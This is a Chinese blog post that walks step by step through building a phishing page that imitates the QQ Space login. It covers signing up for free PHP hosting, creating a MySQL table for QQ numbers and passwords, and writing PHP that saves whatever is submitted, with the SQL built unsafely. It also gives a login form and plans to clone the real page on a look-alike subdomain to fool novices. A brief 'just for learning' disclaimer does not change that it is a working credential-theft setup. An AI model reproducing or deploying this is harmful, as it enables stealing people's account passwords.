伪装qq空间登录
今天在群里,有個人發了個偽裝qq空間的登錄界面,也就是所謂的釣魚網站。不知道的人會去登錄,然后他們的qq號及密碼會被記錄,qq就這樣被盜了。
外面下雨,呆宿舍無聊,于是我也想弄個玩玩。
其實思路很簡單:做個高仿的qq空間登錄界面->對用戶輸入的信息post到后臺并存入數據庫。
在學校用jsp也做了不少的xxx管理系統,知識都是相通的,php也差不多,下午花了點時間學了點php接收前臺數據和寫入數據庫基本知識。下面開搞:
1.申請免費空間,我選擇:http://www.freewebhostingarea.com/ 這個支持php,mysql.申請的空間 3個月沒訪問的話自動收回。申請成功會得到一個2級域名,這里我申請的是:http://fjut.ueuo.com。
2.在它提供的phpMyAdmin中,新建一個表:qq_info 字段:qq, pwd。類型為varchar(20)。
3.寫個測試后臺接收數據并寫入數據庫的php頁面 Info_Rec.php :
<?php
//接收參數
$nameStr=$HTTP_POST_VARS["name"];
$pwdStr=$HTTP_POST_VARS["pwd"];
//連接數據庫
$con=mysql_connect("localhost","填寫數據庫名","填寫密碼") or die("<br>連接服務器失敗!");
//sql語句串
$sql="insert into qq_info values('".$nameStr."','".$pwdStr."')";
//發送查詢字符串
$query=mysql_db_query("填寫數據庫名", $sql, $con) or die("<br>寫入數據庫失敗!");
echo "<br>保存到數據庫成功!"
?>
4.前臺頁面,先寫個測試頁面 index.html :
<form method="post" action="Info_Rec.php"> qq號:<input name="name" type="text" value=""/> <br> 密碼:<input name="pwd" type="password" value=""/> <br> <input type="submit" name="Submit" value="登錄"/> </form>
5.上傳2個頁面文件到空間根目錄。
6.打開http://fjut.ueuo.com輸入qq號和密碼,點登陸。
7.響應成功:
8.打開phpMyAdmin查看qq_info表,說明提交、寫入數據庫成功:
9.基本功能有了。有時間的話把qq空間的登錄界面扒過來做個高仿的,再重新申請個空間2級域名類似user.qzone……。更能達到迷惑小白的效果。
ps:學習交流,咋不做壞事哦。
總結
- 上一篇: 闹闹天宫嫦娥攻略 嫦娥技能介绍
- 下一篇: 微信签名的获取